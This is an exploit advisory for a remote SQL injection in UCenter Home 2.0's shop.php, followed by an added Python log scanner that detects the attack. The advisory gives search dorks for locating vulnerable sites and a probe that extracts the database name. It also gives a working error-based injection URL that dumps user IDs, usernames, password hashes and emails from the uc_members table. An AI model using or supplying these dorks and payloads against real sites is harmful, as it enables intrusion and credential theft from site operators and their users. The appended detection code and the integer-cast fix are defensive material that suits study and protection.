__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerability Type : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim's database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okey.

Edit your DB : `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okey.

Use hex conversion, and edit your SQL injection exploit..

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
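
Detection side, as an added example (not part of the original advisory): a log check that flags shop.php requests whose shopid is not a plain integer, and marks those carrying fragments of the error-based query shown above. The combined access-log format, the function names, the sample lines and the two-fragment threshold are assumptions made for this example.

```python
import re
from urllib.parse import quote, urlsplit, parse_qs

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/\d(?:\.\d)?"')
# Fragments of the error-based pattern in the advisory's query, whitespace removed.
SIGNATURES = ("information_schema", "floor(rand(", "groupby", "concat(", "unhex(")

def normalize(value):
    """Lowercase, then drop MySQL /* */ comments and all whitespace before matching."""
    value = re.sub(r"/\*.*?\*/", "", value.lower(), flags=re.S)
    return re.sub(r"\s+", "", value)

def classify(log_line):
    """Return 'ignore', 'ok', 'non-numeric' or 'sqli-error-based' for one log line."""
    m = REQUEST_RE.search(log_line)
    url = urlsplit(m.group(1)) if m else None
    if url is None or not url.path.lower().endswith("/shop.php"):
        return "ignore"
    verdict = "ok"
    for raw in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
        if re.fullmatch(r"[0-9]+", raw):
            continue  # a legitimate shop id is a plain integer
        verdict = "non-numeric"
        norm = normalize(raw)
        if sum(sig in norm for sig in SIGNATURES) >= 2:  # threshold is an assumption
            return "sqli-error-based"
    return verdict

# Constructed sample log (documentation IPs); the probe is the advisory's first query.
PROBE = ("253 and(select 1 from(select count(*),concat((select (select "
         "concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from "
         "information_schema.tables limit 0,1),floor(rand(0)*2))x from "
         "information_schema.tables group by x)a) and 1=1")
LINE = '192.0.2.{} - - [01/Jan/2024:10:00:0{} +0000] "GET {} HTTP/1.1" 200 512'
SAMPLE_LOG = [
    LINE.format(10, 0, "/shop.php?ac=view&shopid=253"),
    LINE.format(11, 1, "/shop.php?ac=view&shopid=253%27"),
    LINE.format(12, 2, "/shop.php?ac=view&shopid=" + quote(PROBE)),
    LINE.format(13, 3, "/index.php?shopid=1%20group%20by%20concat("),
]

def scan(lines):
    """Return (client_ip, verdict) for every shop.php request that is not 'ok'."""
    results = [(line.split()[0], classify(line)) for line in lines]
    return [(ip, v) for ip, v in results if v not in ("ok", "ignore")]

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```

The same integer check belongs in the application itself: casting shopid to an integer before it reaches the query closes the hole this log check only observes.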